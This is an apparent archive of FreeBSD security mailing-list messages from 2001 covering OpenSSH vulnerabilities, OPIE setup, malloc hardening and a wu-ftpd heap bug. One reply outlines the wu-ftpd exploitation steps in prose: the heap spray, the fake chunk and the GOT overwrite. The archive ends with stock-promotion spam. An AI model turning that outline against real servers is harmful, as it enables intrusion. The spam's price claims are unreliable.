List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Sunday 02 December 2001 22:39, slamdunk wrote:

> Dec 2 01:02:45 www sshd[15029]: fatal: Local: Corrupted

Yes, this is attempt to exploit remote CRC32 integer overflow. Probably it 
wasn't successful if logs were not removed.

> Running SSH Version OpenSSH-1.2.2, protocol version 1.5.
> Compiled with SSL.
> Need I be worried?

This version of OpenSSH is definitely vulnerable, but circulating exploits 
probably doesn't 'support' it. Please upgrade as soon as possible to at least 
OpenSSH 2.3.0.

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 13:43:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27])
	by hub.freebsd.org (Postfix) with ESMTP id 7EF9737B416
	for <freebsd-security@FreeBSD.ORG>; Sun,  2 Dec 2001 13:43:40 -0800 (PST)
Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1])
	by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id IAA05877;
	Mon, 3 Dec 2001 08:43:29 +1100 (EDT)
Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au
 (PMDF V5.2-32 #37640) with ESMTP id <01KBFBQIG2IOVM70M2@cim.alcatel.com.au>;
 Mon, 3 Dec 2001 08:43:28 +1100
Received: (from jeremyp@localhost)	by gsmx07.alcatel.com.au (8.11.6/8.11.6)
 id fB2LhQq03759; Mon, 03 Dec 2001 08:43:26 +1100
Content-return: prohibited
Date: Mon, 03 Dec 2001 08:43:26 +1100
From: Peter Jeremy <peter.jeremy@alcatel.com.au>
Subject: Re: OPIE and ssh
In-reply-to: <20011130220948.T36907-100000@bunning.skiltech.com>; from
 minter@lunenburg.org on Fri, Nov 30, 2001 at 10:10:51PM -0500
To: "H. Wade Minter" <minter@lunenburg.org>
Cc: "f.johan.beisser" <jan@caustic.org>, freebsd-security@FreeBSD.ORG
Mail-Followup-To: "H. Wade Minter" <minter@lunenburg.org>,
	"f.johan.beisser" <jan@caustic.org>, freebsd-security@FreeBSD.ORG
Message-id: <20011203084326.A3702@gsmx07.alcatel.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.5i
References: <15367.51556.94034.892901@horsey.gshapiro.net>
 <20011130220948.T36907-100000@bunning.skiltech.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On 2001-Nov-30 22:10:51 -0500, "H. Wade Minter" <minter@lunenburg.org> wrote:
>On Fri, 30 Nov 2001, Gregory Neil Shapiro wrote:
>
>> Yep, use it every day.  All I did was:
>>
>> cd /etc
>> rm skeykeys
>> ln -s opiekeys skeykeys
>> keyinit gshapiro
>>
>> My ~/.ssh/config contains (among other things):
>>
>> # Defaults
>> Host *
>> 	StrictHostKeyChecking	yes
>
>Is there anything else that needs to be done?  I've been interested in
>playing around with S/Key or OPIE, but when I tried those steps, I still
>get a normal password prompt when I SSH in:
>
>bash-2.04$ slogin kenbridge
>minter@kenbridge's password:

Try adding "ChallengeResponseAuthentication yes" to /etc/ssh/ssh_config.

Peter

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 14:40:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from xela.oopz.com (xela.oopz.com [209.20.244.131])
	by hub.freebsd.org (Postfix) with ESMTP id 335BF37B417
	for <security@freebsd.org>; Sun,  2 Dec 2001 14:40:39 -0800 (PST)
Subject: crypto.2
Date: Sun, 2 Dec 2001 14:40:38 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-ID: <A6A82340FB3DB643A0678E3B10CD5AC1062F43@xela.oopz.com>
content-class: urn:content-classes:message
X-MS-Has-Attach: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
X-MS-TNEF-Correlator: 
Thread-Topic: crypto.2
Thread-Index: AcF7gl15Cq2mamwoRE+q9mecWmXpvQ==
From: "Noah Davidson" <Noah@oopz.com>
To: <security@freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I have an older FreeBSD box, and I want to install openssh 3.0.1 but I
can not seam to find the shared library crypto.2.  Where can I get this?

Thanks
Noah

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 15:17:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from snipe.prod.itd.earthlink.net (snipe.mail.pas.earthlink.net [207.217.120.62])
	by hub.freebsd.org (Postfix) with ESMTP id C140137B416
	for <security@freebsd.org>; Sun,  2 Dec 2001 15:17:36 -0800 (PST)
Received: from dialup-209.245.138.197.dial1.sanjose1.level3.net ([209.245.138.197] helo=blossom.cjclark.org)
	by snipe.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16Afrb-0003pJ-00; Sun, 02 Dec 2001 15:17:36 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB2NHXx30573;
	Sun, 2 Dec 2001 15:17:33 -0800 (PST)
	(envelope-from cjc)
Date: Sun, 2 Dec 2001 15:17:33 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Noah Davidson <Noah@oopz.com>
Cc: security@FreeBSD.ORG
Subject: Re: crypto.2
Message-ID: <20011202151733.B30433@blossom.cjclark.org>
References: <A6A82340FB3DB643A0678E3B10CD5AC1062F43@xela.oopz.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <A6A82340FB3DB643A0678E3B10CD5AC1062F43@xela.oopz.com>; from Noah@oopz.com on Sun, Dec 02, 2001 at 02:40:38PM -0800
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Sun, Dec 02, 2001 at 02:40:38PM -0800, Noah Davidson wrote:
> I have an older FreeBSD box, and I want to install openssh 3.0.1 but I
> can not seam to find the shared library crypto.2.  Where can I get this?

That's a tricky one. Just how old is the FreeBSD box? It seems the
easiest way to get the library would be to build it (in
secure/lib/libcrypto) using up to date STABLE source.
-- 
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 18: 1:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153])
	by hub.freebsd.org (Postfix) with ESMTP id BEA0F37B416
	for <freebsd-security@freebsd.org>; Sun,  2 Dec 2001 18:01:30 -0800 (PST)
Received: from madman.nectar.com (madman.nectar.com [10.0.1.111])
	by gw.nectar.com (Postfix) with ESMTP id 51DDE2C
	for <freebsd-security@freebsd.org>; Sun,  2 Dec 2001 20:01:30 -0600 (CST)
Received: (from nectar@localhost)
	by madman.nectar.com (8.11.6/8.11.3) id fB321Uu99421
	for freebsd-security@freebsd.org; Sun, 2 Dec 2001 20:01:30 -0600 (CST)
	(envelope-from nectar)
Date: Sun, 2 Dec 2001 20:01:30 -0600
From: "Jacques A. Vidrine" <n@nectar.com>
To: freebsd-security@freebsd.org
Subject: Fwd: [cvs commit: src/crypto/openssh session.c]
Message-ID: <20011203020130.GA99399@madman.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" <n@nectar.com>,
	freebsd-security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.23.1i
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hello,

There will be a security advisory released for this within the next day
or two.   Meanwhile, here's the short version:

  If you are running an OpenSSH server with `UseLogin yes', then an
  otherwise legitimate user of your system may be able to execute
  arbitrary code as root.
  
  By default, OpenSSH runs with `UseLogin no', so you probably have
  nothing to worry about unless you've changed that.

Cheers,
-- 
Jacques A. Vidrine <n@nectar.com>                   http://www.nectar.com/
NTT/Verio SME           .      FreeBSD UNIX      .        Heimdal Kerberos
jvidrine@verio.net      .   nectar@FreeBSD.org   .           nectar@kth.se

----- Forwarded message from Jacques Vidrine <nectar@FreeBSD.org> -----
Date: Sun, 2 Dec 2001 16:51:47 -0800 (PST)
From: Jacques Vidrine <nectar@FreeBSD.org>
To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org
Subject: cvs commit: src/crypto/openssh session.c

nectar      2001/12/02 16:51:47 PST

  Modified files:
    crypto/openssh       session.c 
  Log:
  Do not pass user-defined environmental variables to /usr/bin/login.
  
  Obtained from:  OpenBSD
  Approved by:    green
  
  Revision  Changes    Path
  1.18      +2 -0      src/crypto/openssh/session.c

----- End forwarded message -----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Sun Dec  2 18:30:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (oe13.pav1.hotmail.com [64.4.30.117])
	by hub.freebsd.org (Postfix) with ESMTP id 9B6B837B41D
	for <freebsd-security@FreeBSD.ORG>; Sun,  2 Dec 2001 18:30:52 -0800 (PST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sun, 2 Dec 2001 18:30:52 -0800
X-Originating-IP: [24.114.220.235]
From: "jack xiao" <jack_xiao99@hotmail.com>
To: <freebsd-security@FreeBSD.ORG>
Subject: SA regenerated problems
Date: Sun, 2 Dec 2001 21:32:54 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_009F_01C17B78.E6D9A600"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <OE13q9MrEB4NHOUFw0R00019700@hotmail.com>
X-OriginalArrivalTime: 03 Dec 2001 02:30:52.0534 (UTC) FILETIME=[8724D160:01C17BA2]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

This is a multi-part message in MIME format.

------=_NextPart_000_009F_01C17B78.E6D9A600
Content-Type: text/plain;
	charset="gb2312"
Content-Transfer-Encoding: base64

SGksDQoNCkkgYW0gc2V0dGluZyB1cCBpcHNlYyB0dW5uZWxzIGJldHdlZW4gdHdvIEZyZWVCU0Q0
LjIgUkVMRUFTRSBzZXJ2ZXJzIGFuZCBtZXQgdGhlIFNBIHJlZ2VuZXJhdGVkIHByb2JsZW0uIEl0
IHNlZW1zIHRoZSBuZXcgU0EgY2FuIG5vdCBiZSBnZW5lcmF0ZWQgaW4gdGltZSBhbmQgcHJvcGVy
bHkgc29tZSB0aW1lIHdoZW4gdGhlIFNBIGxpZmUgdGltZSBpcyBvdmVyLiBBcyBmYXIgYXMgSSBr
bm93LCB0aGUgaXBzZWMgc3RhY2sgaGFzIGJlZW4gdXBncmFkZWQgYmV0d2VlbiA0LjIgYW5kIDQu
NC4gU28gb25lIHNvbHV0aW9uIGZvciB0aGlzIGlzIHRvIHVwZ3JhZGUgdG8gNC40LiBCdXQgSSBh
bSB3b25kZXJpbmcgaWYgSSBjYW4ganVzdCBtaWdyYXRlIHNvbWUgcHJvZ3JhbXMgZnJvbSA0LjQg
d2l0aG91dCB1cGdyYWRlIHRoZSB3aG9sZSBPUy4gQW55IGlkZWFzIHdpbGwgYmUgYXBwcmVjaWF0
ZWQuIFRoYW5rcy4NCg0KSmFjayANCg0K

------=_NextPart_000_009F_01C17B78.E6D9A600
Content-Type: text/html;
	charset="gb2312"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUgY29udGVu
dD0idGV4dC9odG1sOyBjaGFyc2V0PWdiMjMxMiI+DQo8TUVUQSBjb250ZW50PSJNU0hUTUwgNi4w
MC4yNjAwLjAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwvU1RZTEU+DQo8L0hFQUQ+DQo8Qk9E
WSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPjxGT05UIGZhY2U9QXJpYWwgc2l6ZT0yPjxGT05UIHNp
emU9Mz5IaSw8QlI+PEJSPkkgYW0gc2V0dGluZyB1cCBpcHNlYyANCnR1bm5lbHMgYmV0d2VlbiB0
d28gRnJlZUJTRDQuMiBSRUxFQVNFIHNlcnZlcnMgYW5kIG1ldCB0aGUgU0EgcmVnZW5lcmF0ZWQg
DQpwcm9ibGVtLiBJdCBzZWVtcyB0aGUgbmV3IFNBIGNhbiBub3QgYmUgZ2VuZXJhdGVkIGluIHRp
bWUgYW5kIHByb3Blcmx5IHNvbWUgdGltZSANCndoZW4gdGhlIFNBIGxpZmUgdGltZSBpcyBvdmVy
LiBBcyBmYXIgYXMgSSBrbm93LCB0aGUgaXBzZWMgc3RhY2sgaGFzIGJlZW4gDQp1cGdyYWRlZCBi
ZXR3ZWVuIDQuMiBhbmQgNC40LiBTbyBvbmUgc29sdXRpb24gZm9yIHRoaXMgaXMgdG8gdXBncmFk
ZSB0byA0LjQuIEJ1dCANCkkgYW0gd29uZGVyaW5nIGlmIEkgY2FuIGp1c3QgbWlncmF0ZSBzb21l
IHByb2dyYW1zIGZyb20gNC40IHdpdGhvdXQgdXBncmFkZSB0aGUgDQp3aG9sZSBPUy4gQW55IGlk
ZWFzIHdpbGwgYmUgYXBwcmVjaWF0ZWQuIFRoYW5rcy48QlI+PEJSPkphY2sgDQo8L0ZPTlQ+PEJS
PjwvRk9OVD48L0RJVj48L0JPRFk+PC9IVE1MPg0K

------=_NextPart_000_009F_01C17B78.E6D9A600--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  1:16:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from junior.lgc.com (junior.lgc.com [134.132.72.99])
	by hub.freebsd.org (Postfix) with ESMTP id EE5ED37B405
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 01:16:42 -0800 (PST)
Received: from lgchvw02.lgc.com (lgchvw02.lgc.com [134.132.93.108])
	by junior.lgc.com (8.11.3/8.11.3) with SMTP id fB39Fm726188
	for <freebsd-security@freebsd.org>; Mon, 3 Dec 2001 03:15:48 -0600 (CST)
Received: from 134.132.72.99 by lgchvw02.lgc.com (InterScan E-Mail VirusWall NT); Mon, 03 Dec 2001 03:16:33 -0600
Received: from vesna (oleg@[134.132.197.98])
	by junior.lgc.com (8.11.3/8.11.3) with SMTP id fB39FfS26171
	for <freebsd-security@freebsd.org>; Mon, 3 Dec 2001 03:15:42 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: Oleg Cherkasov <Oleg.Cherkasov@mail.com>
Organization: http://oleg.dnsalias.com
To: freebsd-security@freebsd.org
Subject: Re: philosophical question...
Date: Mon, 3 Dec 2001 10:16:26 +0100
X-Mailer: KMail [version 1.2]
References: <200112011658.fB1Gwep07621@cwsys.cwsent.com>
In-Reply-To: <200112011658.fB1Gwep07621@cwsys.cwsent.com>
MIME-Version: 1.0
Message-Id: <01120310162607.10748@vesna>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Saturday 01 December 2001 17:57, Cy Schubert - ITSD Open Systems Group 
wrote:
> In message <200112011642.JAA09819@lariat.org>, Brett Glass writes:
> > > Would it inconvenience debugging that malloc(3) becomes non
> > > deterministic in its layout ?
> > >
> > > Would the increased uncertainty on program run-time be
> > > good or bad ?
> >
> > It could make reproduction of problems more difficult. So, if
> > it goes in, I'd like a switch to turn it off.... Maybe a
> > sysctl.
> >
> > But there's a more serious philosophical issue here. Isn't
> > shuffling the heap to avoid attacks really a form of
> > "security via obscurity?"
>
> Defence through depth.  Every little bit helps.  I think we should do
> this.
>
> I suppose we could have a malloc.conf bit to turn this feature off (on
> by default).

Think a new key 'malloc.random' for sysctl could be more useful, protected 
with 'kern.securelevel' > 1.

Oleg

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  1:23:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [216.33.66.196])
	by hub.freebsd.org (Postfix) with ESMTP id 4D94F37B405
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 01:23:06 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
	id EC6B681D03; Mon,  3 Dec 2001 03:23:05 -0600 (CST)
Date: Mon, 3 Dec 2001 03:23:05 -0600
From: Alfred Perlstein <bright@mu.org>
To: Oleg Cherkasov <Oleg.Cherkasov@mail.com>
Cc: freebsd-security@freebsd.org
Subject: Re: philosophical question...
Message-ID: <20011203032305.K92148@elvis.mu.org>
References: <200112011658.fB1Gwep07621@cwsys.cwsent.com> <01120310162607.10748@vesna>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <01120310162607.10748@vesna>; from Oleg.Cherkasov@mail.com on Mon, Dec 03, 2001 at 10:16:26AM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

* Oleg Cherkasov <Oleg.Cherkasov@mail.com> [011203 03:16] wrote:
> 
> Think a new key 'malloc.random' for sysctl could be more useful, protected 
> with 'kern.securelevel' > 1.

However, malloc(3) has nothing to do with the kernel.

-- 
-Alfred Perlstein [alfred@freebsd.org]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  2:26:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gwdu60.gwdg.de (gwdu60.gwdg.de [134.76.98.60])
	by hub.freebsd.org (Postfix) with ESMTP id 4B81237B41B
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 02:26:30 -0800 (PST)
Received: from localhost (kheuer@localhost)
	by gwdu60.gwdg.de (8.11.6/8.11.6) with ESMTP id fB3AQLN01352;
	Mon, 3 Dec 2001 11:26:25 +0100 (CET)
	(envelope-from kheuer@gwdu60.gwdg.de)
Date: Mon, 3 Dec 2001 11:26:20 +0100 (CET)
From: Konrad Heuer <kheuer@gwdu60.gwdg.de>
To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Cc: freebsd-security@freebsd.org
Subject: Re: ISSalert: ISS Security Alert: WU-FTPD Heap Corruption Vulnerability
 (fwd)
In-Reply-To: <200112011125.fB1BPjf74314@mailhost.freebsd.lublin.pl>
Message-ID: <20011203112522.J1350-100000@gwdu60.gwdg.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


On Sat, 1 Dec 2001, Przemyslaw Frasunek wrote:

> On Friday 30 November 2001 09:53, Konrad Heuer wrote:
> > Any opinions whether wu-ftpd on FreeBSD is vulnerable too? To my mind, =
it
> > seems so.
>
> actually, wu-ftpd on FreeBSD is vulnerable, but phk-malloc design prevent=
s
> from exploiting this. typical scenario of exploitation on linux box is:
>
> - attacker populates heap with pointers to proctitle buf by calling few t=
imes
> 'STAT ~{ptrptrptrptr'
>
> - after that, attacker does 'STAT {~' which calls two times blockfree() i=
n
> ftpglob() and malicious 'ptr' is passed to free()
>
> - in proctitle buf there is a fake malloc chunk, pointing to syslog() GOT
> entry and shellcode, also located in proctitle buf
>
> - free() when trying to deallocate fake chunk overwrites pointer to syslo=
g()
> function and then segfaults
>
> - segfault sighandler calls syslog() and shellcode is executed
>
> as you can see, exploitation of this vulnerability isn't so simple. after
> spending long hours with gdb, looks like it's exploitable only on dlmallo=
c
> from glibc.

Thank you very much for your help which made a patch possible!

Best regards
Konrad

Konrad Heuer                                    Personal Bookmarks:
Gesellschaft f=FCr wissenschaftliche
   Datenverarbeitung mbH G=D6ttingen              http://www.freebsd.org
Am Fa=DFberg, D-37077 G=D6ttingen                   http://www.daemonnews.o=
rg
Deutschland (Germany)

kheuer@gwdu60.gwdg.de


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  4: 7:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.acumenex.net (mad.acumenex.net [216.185.65.133])
	by hub.freebsd.org (Postfix) with ESMTP id B0A3D37B417
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 04:07:40 -0800 (PST)
Received: from mta.excite.com ([67.202.27.220]) by mail.acumenex.net  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Mon, 3 Dec 2001 06:53:43 -0500
Message-ID: <0000445e5122$00005235$000011a3@mta.excite.com>
To: <Informed-Investors@FreeBSD.ORG>
From: SSpoint@excIte.com
Subject: **STOCK ALERT - GASE** IMPORTANT                 QIA
Date: Mon, 03 Dec 2001 06:02:38 -1800
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Reply-To: SSpoint10@excite.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

<HTML>
<BODY bgColor=3D#ffffff leftMargin=3D0 topMargin=3D0 rightMargin=3D0 margi=
nwidth=3D"0" 
marginheight=3D"0">
<DIV><FONT face=3DArial size=3D2></FONT><BR></DIV>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
  <TBODY>
  <TR>
    <TD width=3D"100%" 
    background=3Dhttp://www.stockscape.com/micro/scs/gasco/topbarbackdrop.=
jpg 
    colSpan=3D2>&nbsp;</TD></TR>
  <TR>
    <TD width=3D"100%" bgColor=3D#c8c8c8 colSpan=3D2>&nbsp;</TD></TR>
  <TR>
    <TD colSpan=3D2>
      <TABLE cellSpacing=3D0 cellPadding=3D8 width=3D"100%" border=3D0>
        <TBODY>
        <TR>
          <TD vAlign=3Dtop>
            <TABLE cellSpacing=3D0 cellPadding=3D5 width=3D200 align=3Drig=
ht border=3D0>
              <TBODY>
              <TR>
                <TD width=3D3 bgColor=3D#ffffff><FONT size=3D1>&nbsp;</FON=
T></TD>
                <TD width=3D"100%" bgColor=3D#000080>
                  <P align=3Dcenter><B><FONT face=3DVerdana color=3D#fffff=
f size=3D2>KEY 
                  FEATURES</FONT></B></P></TD></TR>
              <TR>
                <TD width=3D3 bgColor=3D#ffffff><FONT size=3D1>&nbsp;</FON=
T></TD>
                <TD width=3D"100%" bgColor=3D#dddddd>
                  <UL>
                    <LI>
                    <P><FONT face=3DVerdana size=3D2>Unrisked future net r=
evenue of 
                    $2.42 Billion from Utah properties alone <BR><BR></FON=
T></P>
                    <LI><FONT face=3DVerdana size=3D2>$14.80 / share price=
 target 
                    forecast by Canaccord Capital <BR><BR></FONT>
                    <LI><FONT face=3DVerdana size=3D2>Important strategic 
                    partnerships with Phillips Petroleum, Halliburton Co. =
and 
                    Burlington Resources <BR><BR></FONT>
                    <LI><FONT face=3DVerdana size=3D2>Named one of Colorad=
o's 100 
                    Fastest Growing Companies by Denver Business Journal 
                    <BR><BR></FONT>
                    <LI><FONT face=3DVerdana size=3D2>Strong management te=
am led by 
                    an established team of oil &amp; gas leaders 
                    <BR><BR></FONT></LI></UL></TD></TR></TBODY></TABLE>
            <TABLE border=3D0>
              <TBODY>
              <TR>
                <TD vAlign=3Dtop><IMG 
                  src=3D"http://www.stockscape.com/micro/scs/gasco/gasco.j=
pg"></TD>
                <TD vAlign=3Dtop width=3D10>&nbsp;</TD>
                <TD vAlign=3Dcenter align=3Dleft width=3D"100%"><FONT face=
=3Dverdana 
                  color=3D#002a4f size=3D3><STRONG>Leading Petroleum Engin=
eering 
                  firm reports GASCO ENERGY=FFFFFF92s unrisked future net =
revenues of 
                  $2.4 billion from Utah wells alone. Analyst forecasts 
                  $14.80/share price target!</STRONG></FONT></TD></TR></TB=
ODY></TABLE>
            <P align=3Djustify><FONT face=3Dverdana size=3D2>Gasco Energy =
Inc. is an 
            oil &amp; gas company whose natural gas properties could poten=
tially 
            begin producing in the billion-dollar range, but is still trad=
ing 
            under $3 per share! 
            <P align=3Djustify><FONT face=3Dverdana size=3D2><IMG hspace=3D=
6 
            src=3D"http://www.stockscape.com/micro/scs/gasco/gas1.jpg" ali=
gn=3Dleft 
            vspace=3D1 border=3D0>Recently, Gasco Energy=FFFFFF92s (OTCBB:=
 GASE) properties 
            and future revenues in Utah were independently evaluated and 
            estimated by Netherland, Sewell &amp; Associates (NSAI) =FFFFF=
F96 a 
            40-year-old international petroleum consulting firm. NSAI (<A 
            href=3D"http://www.netherlandsewell.com" 
            target=3D_blank>www.netherlandsewell.com</A>) has worked with =
hundreds 
            of top financial institutions from Bank of America to Credit S=
uisse 
            as well as major oil and gas companies from Exxon to Shell. 
            <P align=3Djustify><FONT face=3Dverdana size=3D2>The report st=
ates that 
            the estimated unrisked future net revenue on GASE=FFFFFF92s in=
terest will 
            most likely produce $2.42 BILLION!! Please note that the repor=
t 
            discusses NET revenues, which are calculated by deducting stat=
e 
